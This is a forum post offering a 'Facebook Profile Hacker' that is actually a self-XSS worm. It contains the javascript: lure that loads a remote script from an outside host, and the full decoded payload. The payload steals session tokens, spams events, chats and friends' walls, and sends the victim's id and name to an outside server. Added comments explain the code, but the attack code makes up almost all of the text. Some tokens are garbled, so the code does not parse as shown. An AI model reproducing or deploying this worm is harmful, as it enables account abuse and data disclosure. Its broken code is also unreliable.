04-26-2011, 08:30 AM
[GET] Facebook Profile Hacker 2.0
This is not for NOOB, please use with caution
I was a little bored today and came to this page:
Code:
You noticed this section:
Code:
It tricks visitors into pasting that code into the address bar, which injects the malicious JavaScript into their own logged-in Facebook page (self-XSS). The script then spams their wall and their friends' walls, and also opens Facebook's Ajax chat and spams a message there as well.
So I fully decoded this shit:
Code:
Enjoy!
This is not for NOOB, please use with caution
I was a little bored today and came to this page:
Code:
http://dumbfb.blogspot.com
You noticed this section:
Code:
// Analysis note: self-XSS lure. Run as a javascript: URL on an open page, this
// creates a <script> element, points its src at a protocol-relative URL on a
// third-party host, and appends it to document.body. The fetched script then
// executes in the origin of whatever page the user has open, with that page's
// session. `a` and `b` are assigned without declaration, and the trailing void(0)
// keeps the URL from navigating the page to the expression's value.
// Most current browsers strip or block the javascript: scheme when text is pasted
// into the address bar, which blunts this delivery method.
javascript:(a=(b=document).createElement('script')).src='//hefoll0wme.info/checker2.js',b.body.appendChild(a);void(0)
So I fully decoded this shit:
Code:
// Configuration block of the decoded payload. The bracket-style property access
// (Math['floor']) is left over from the poster's de-obfuscation.
// Only `randomnumber` is used later in this listing (appended to `url` so each
// advertised link differs); randomnumber1-4 and `random` are never referenced again.
var randomnumber = Math['floor'](Math['random']() * 99999);
var randomnumber1 = Math['floor'](Math['random']() * 987);
var randomnumber2 = Math['floor'](Math['random']() * 754);
var randomnumber3 = Math['floor'](Math['random']() * 43);
var randomnumber4 = Math['floor'](Math['random']() * 9);
var random = Math['floor'](Math['random']() * 5);
// Landing page advertised in every spam message (useful as an indicator when
// searching wall posts, chat logs or event descriptions).
var url = 'http://hellobusters.blogspot.com?';
// Chat template; %firstname% is replaced per recipient further down.
var message = '%firstname%, i can hack ANY facebook account! it\'s so easy! check it out ';
// Event description template.
var ev = 'Hey everyone, \x0A\x0A I have found out how you can hack ANYONE\'s facebook account \x0A\x0A it\'s so easy! \x0A check it out - ';
// Defined but not used anywhere else in this listing.
var ev2 = '\x0A\x0Ajust don\'t log into mine :)';
// Wall-post template; each of the four %tf% markers is replaced with a friend's name.
var test = 'I have hacked: %tf%\'s, %tf%\'s, %tf%\'s and %tf%\'s accounts!\x0A\x0A it\'s so easy!\x0ACheck it out - ';
var eventname = 'HACK FACEBOOK!!';
// Destination the victim's top-level window is sent to once the script is done.
var redirect = 'http://hefoll0wme.info/final.php';
var postmessage = test + url + randomnumber;
var chatmessage = message + url + randomnumber;
var eventdesc = ev + url + randomnumber;
// Upper bound on the number of friend-wall posting rounds (passed to the recursive poster).
var nfriends = 4000;
// When true, intermediate results are shown with alert().
var debug = false;
// Count of outstanding tasks; mf() only redirects once this is <= 0.
var wf = 0;
// Completion hook. If the pending-task counter `wf` is zero or negative, schedules
// a navigation of the top-level window to `redirect` after 500 ms; otherwise does
// nothing. It declares no parameters, so when callers write mf(--wf) only the
// decrement side effect matters.
var mf = function () {
if (wf <= 0) {
setTimeout(function () {
window['top']['location']['href'] = redirect
}, 500)
}
};
// Small XMLHttpRequest GET helper.
//   a - URL to request (every caller in this listing passes a site-relative path)
//   b - optional callback, called with responseText when the status is 200
//   c - optional callback, called once the request completes, whatever the status
// The requests are issued from inside the victim's page, so they are same-origin
// and the browser sends the session cookies with them as usual.
var doget = function (a, b, c) {
var d = new XMLHttpRequest();
d['open']('GET', a);
d['onreadystatechange'] = function () {
if (d['readyState'] == 4) {
// NOTE(review): `and&` is not valid JavaScript; as posted, the listing does not
// parse (looks like a forum rendering artifact).
if (d['status'] == 200 and& b) {
b(d['responseText'])
};
if (c) {
c()
}
}
};
d['send']()
};
// Main body of the payload: fetch the site's home page ('/') from inside the
// victim's session and drive everything below from the returned HTML (u).
// Behaviour visible in this listing, useful when hunting for it in logs:
//   1. scrape hidden form values and the user's id/name from the page and cookie
//   2. cover the page with a "Please wait" overlay
//   3. create an event and invite the friend list
//   4. send a chat message to every friend listed as available
//   5. post a status update, then post to friends' walls about every 2 seconds
//   6. navigate the top window to the external `redirect` URL with the victim's
//      user id and display name in the query string
// There is no try/catch anywhere: any failed match(...)[n] lookup aborts the callback.
doget('/', function (u) {
// Logged-in user's numeric id, read from the c_user cookie via document.cookie
// (so the cookie is readable by script). Throws if the cookie is absent.
var v = document['cookie']['match'](/c_user=(\d+)/)[1];
// Formats a friend record as '@[id:name]' (presumably the site's mention markup);
// returns '' for a missing record.
var w = function (a) {
return a ? '@[' + a['id'] + ':' + a['name'] + ']' : ''
};
// Plain-text counterpart of w: just the friend's name, or ''.
var x = function (a) {
return a ? a['name'] : ''
};
// Serialises an object as key=value pairs with URI-encoded values; keys whose value
// is null are emitted bare, without '='. `out` is assigned without declaration, so
// it is an implicit global. NOTE(review): as posted, the pair separator is the
// literal string 'and'.
var y = function (a) {
out = '';
for (var b in a) {
out += (out ? 'and' : '') + b + ((a[b] !== null) ? '=' + encodeURIComponent(a[b]) : '')
};
return out
};
// XMLHttpRequest POST helper with a form-urlencoded body.
//   a - URL, b - object serialised with y() as the body,
//   c - optional callback given responseText on status 200,
//   d - optional callback run on completion regardless of status.
var z = function (a, b, c, d) {
var e = new XMLHttpRequest();
e['open']('POST', a);
e['setRequestHeader']('Content-Type', 'application/x-www-form-urlencoded');
e['onreadystatechange'] = function () {
if (e['readyState'] == 4) {
// NOTE(review): same invalid `and&` token as in doget above.
if (e['status'] == 200 and& c) {
c(e['responseText'])
};
if (d) {
d()
}
}
};
e['send'](y(b))
};
// Builds a white, full-size, top-of-stack (zIndex 999999) overlay with a
// "Please wait" message, hiding the page while the requests below run. The
// "click here" link forces wf to 0 and calls mf(), i.e. redirects immediately.
var A = function () {
var a = document['createElement']('div');
a['style']['display'] = 'block';
a['style']['position'] = 'absolute';
a['style']['width'] = 100 + '%';
a['style']['height'] = 100 + '%';
a['style']['left'] = 0 + 'px';
a['style']['top'] = 0 + 'px';
a['style']['textAlign'] = 'center';
a['style']['padding'] = '4px';
a['style']['background'] = '#FFFFFF';
a['style']['zIndex'] = 999999;
a['innerHTML'] = ' <br/>Please wait, this can take a little while...<br/><br/> If it takes more than a minute..<a href="javascript:void(0);" onclick="wf=0; mf();">click here</a> ';
document['body']['appendChild'](a)
};
// Composer id scraped from the home page HTML (the pattern expects backslash-escaped
// quotes). Falls back to ''. `comp` is an implicit global.
var B = u['match'](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i);
if (B) {
comp = B[1]
} else {
comp = ''
};
// post_form_id and fb_dtsg are hidden form values scraped from the page and
// replayed on every POST below. They appear to be the site's anti-CSRF tokens,
// which do not help once script runs inside the page's own origin and can read
// them. Either lookup throws if the field is not found.
var C = u['match'](/name="post_form_id" value="([\d\w]+)"/i)[1];
var D = u['match'](/name="fb_dtsg" value="([\d\w]+)"/i)[1];
// Display name, read from the text of the #navAccountName element.
var E = document['getElementById']('navAccountName')['firstChild']['data'];
// The victim's user id and display name are appended to the external redirect URL,
// so both are disclosed to that host when the final navigation happens.
redirect = redirect + '?' + y({
userid: v,
name: E,
doclose: 1
});
A();
// --- Task 1: create an event and invite the friend list ---
if (eventdesc) {
wf++;
// First request: the response is only used to extract a "token" value.
z('/ajax/choose/?__a=1', {
type: 'event',
eid: null,
invite_message: '',
__d: 1,
post_form_id: C,
fb_dtsg: D,
lsd: null,
post_form_id_source: 'AsyncRequest'
}, function (h) {
var i = h['match'](/\\"token\\":\\"([^\\]+)\\"/)[1];
// Friend typeahead endpoint, queried with the viewer id and the token just obtained.
var j = '/ajax/typeahead/first_degree.php?__a=1&viewer=' + v + '&token=' + i + '&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha';
doget(j, function (a) {
// Collect every uid in the response except the victim's own.
// match() returns null when nothing matches, in which case b['length'] throws.
var b = a['match'](/\{"uid":\d+,/g);
var c = [];
for (var d = 0; d < b['length']; d++) {
var e = b[d]['match'](/:(\d+),/)[1];
if (e != v) {
c['push'](e)
}
};
// Event start: 24 hours from now, as M/D/YYYY plus (current hour * 60).
// datestr and timestr are implicit globals.
var f = new Date();
f['setTime'](f['getTime']() + 60 * 60 * 24 * 1000);
datestr = (f['getMonth']() + 1) + '/' + f['getDate']() + '/' + f['getFullYear']();
timestr = f['getHours']() * 60;
// Event creation form: the spam name/description, with all collected friend ids
// as invitees.
var g = {
post_form_id: C,
fb_dtsg: D,
start_dateIntlDisplay: datestr,
start_date: datestr,
start_time_hour_min: timestr,
name: eventname,
place_page_id: '',
location: '',
street: '',
geo_id: '',
geo_sq: '',
desc: eventdesc,
sgb_invitees: c['join'](','),
sgb_emails: '',
sgb_message: '',
privacy_type: 'on',
guest_list: 'on',
connections_can_post: 'on',
save: 'Create Event',
submitting: ''
};
g['new'] = '';
// The response body is ignored (success callback is false); the task is marked
// finished on completion whatever the status.
z('/events/create.php', g, false, function () {
mf(--wf)
})
})
})
};
// --- Task 2: chat message to every friend listed as available ---
if (chatmessage) {
wf++;
z('/ajax/chat/buddy_list.php?__a=1', {
user: v,
post_form_id: C,
fb_dtsg: D,
lsd: null,
post_form_id_source: 'AsyncRequest',
popped_out: false,
force_render: true
}, function (a) {
// Drops the first 9 characters of the response (presumably a guard prefix placed
// before the JSON) and then eval()s the rest: the response text is executed as
// code rather than parsed as data.
var b = a['substr'](9);
var c = eval('(' + b + ')');
var d = c['payload']['buddy_list'];
// One send request per key of nowAvailableList; the key is used both as the
// recipient id and as the index into userInfos for the first name.
for (var e in d['nowAvailableList']) {
// f, g and h are computed but never used; the request below recomputes each value.
var f = Math['floor'](Math['random']() * 1335448958);
var g = (new Date())['getTime']();
var h = chatmessage['replace']('%firstname%', d['userInfos'][e]['firstName']['toLowerCase']());
z('/ajax/chat/send.php?__a=1', {
msg_id: Math['floor'](Math['random']() * 1335448958),
client_time: (new Date())['getTime'](),
msg_text: chatmessage['replace']('%firstname%', d['userInfos'][e]['firstName']['toLowerCase']()),
to: e,
post_form_id: C,
fb_dtsg: D,
post_form_id_source: 'AsyncRequest'
})
};
// Marked finished as soon as the sends are queued, not when they complete.
mf(--wf)
})
};
// --- Task 3: status update plus posts on friends' walls ---
if (postmessage) {
wf++;
doget('/ajax/browser/friends/?uid=' + v + '&filter=all&__a=1&__d=1', function (g) {
// Pull (thumbnail filename ... profile link) fragments out of the response, then
// take a number from the thumbnail filename as the friend id and the link text as
// the friend name.
var h = g['match'](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi);
var i = [];
if (h) {
for (var j = 0; j < h['length']; j++) {
var k = h[j]['match'](/_\d+_/)[0]['replace'](/_/g, '');
var l = h[j]['match'](/>[^>]+\\u003c\\\/a>$/i)[0]['replace'](/\\u003c\\\/a>$/gim, '')['replace'](/>/g, '');
i['push']({
id: k,
name: l
})
}
};
// Draw friends from i at random without replacement into two identical lists:
// n supplies names for the %tf% markers, o supplies the walls to post on.
var n = [];
var o = [];
while (i['length']) {
var p = Math['floor'](Math['random']() * i['length']);
n['push'](i[p]);
o['push'](i[p]);
var q = i['shift']();
if (p) {
i[p - 1] = q
}
};
if (debug) {
alert('fetched friends: ' + n['length'])
};
// First post goes to the victim's own wall (target id is the victim, context 'home').
var r = {
post_form_id: C,
fb_dtsg: D,
xhpc_composerid: comp,
xhpc_targetid: v,
xhpc_context: 'home',
xhpc_fbx: '',
lsd: null,
post_form_id_source: 'AsyncRequest'
};
// mt gets plain names, m gets the '@[id:name]' form; both are implicit globals.
// Each %tf% consumes one entry from n; when n is empty the marker becomes ''.
mt = postmessage;
m = postmessage;
while (mt['search']('%tf%') >= 0) {
var s = n['pop']();
mt = mt['replace']('%tf%', x(s));
m = m['replace']('%tf%', w(s))
};
r['xhpc_message_text'] = mt;
r['xhpc_message'] = m;
if (debug) {
alert('message text: ' + mt)
};
z('/ajax/updatestatus.php?__a=1', r);
// Recursive poster: one friend-wall post per call, re-armed every 2000 ms.
// Stops (forces wf to 0 and redirects) when the countdown `a` hits 0 or the name
// pool n is empty. The target is taken from o before the emptiness check, so if no
// friends were parsed b is undefined and b['id'] throws.
var t = function (a) {
if (a == 0) {
wf = 0;
mf();
return
};
var b = o['shift']();
var c = {
post_form_id: C,
fb_dtsg: D,
xhpc_composerid: comp,
xhpc_targetid: b['id'],
xhpc_context: 'profile',
xhpc_fbx: 1,
lsd: null,
post_form_id_source: 'AsyncRequest'
};
var d = postmessage;
var e = postmessage;
if (n['length'] == 0) {
wf = 0;
mf();
return
};
while (d['search']('%tf%') >= 0) {
var f = n['pop']();
d = d['replace']('%tf%', x(f));
e = e['replace']('%tf%', w(f))
};
c['xhpc_message_text'] = d;
c['xhpc_message'] = e;
z('/ajax/updatestatus.php?__a=1', c);
setTimeout(function () {
t(a - 1)
}, 2000)
};
// Second increment for this task; it is never decremented, only reset to 0 by t,
// so the redirect waits for the wall-posting loop to finish.
wf++;
setTimeout(function () {
t(nfriends)
}, 2000)
})
};
// With tasks still pending (wf > 0) this call does nothing; it only redirects
// straight away if none of the three tasks was started.
mf()
});